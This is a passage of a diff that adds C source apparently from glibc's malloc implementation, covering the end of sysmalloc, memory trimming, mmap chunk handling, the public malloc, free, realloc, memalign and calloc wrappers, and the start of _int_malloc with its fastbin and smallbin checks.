+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    ar_ptr = arena_for_chunk (oldp);
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    __libc_lock_unlock (av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      do
+        {
+          victim = pp;
+          if (victim == NULL)
+            break;
+        }
+      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
+             != victim);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+	if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
